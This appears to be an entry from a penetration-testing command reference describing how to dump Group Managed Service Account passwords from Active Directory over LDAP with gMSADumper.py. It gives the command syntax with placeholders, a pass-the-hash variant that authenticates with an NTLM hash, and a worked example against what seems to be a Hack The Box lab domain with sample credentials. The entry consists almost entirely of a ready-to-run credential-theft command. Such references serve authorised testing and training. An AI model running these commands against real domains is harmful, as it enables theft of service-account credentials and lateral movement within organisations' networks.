gMSA Password Dump

Read password of Group Managed Service Account

Tool
python
Category
Credential Attacks / gMSA & LAPS
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

python gMSADumper.py -u '<user>' -p '<password>' -d '<domain>' -l '<ip>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

python gMSADumper.py -u '<user>' -p '<hash>' -d '<domain>' -l '<ip>'

Examples

python gMSADumper.py -u alfred -p basketball -d tombwatcher.htb -l tombwatcher.htb

Tags

gmsa password service-account ldap

References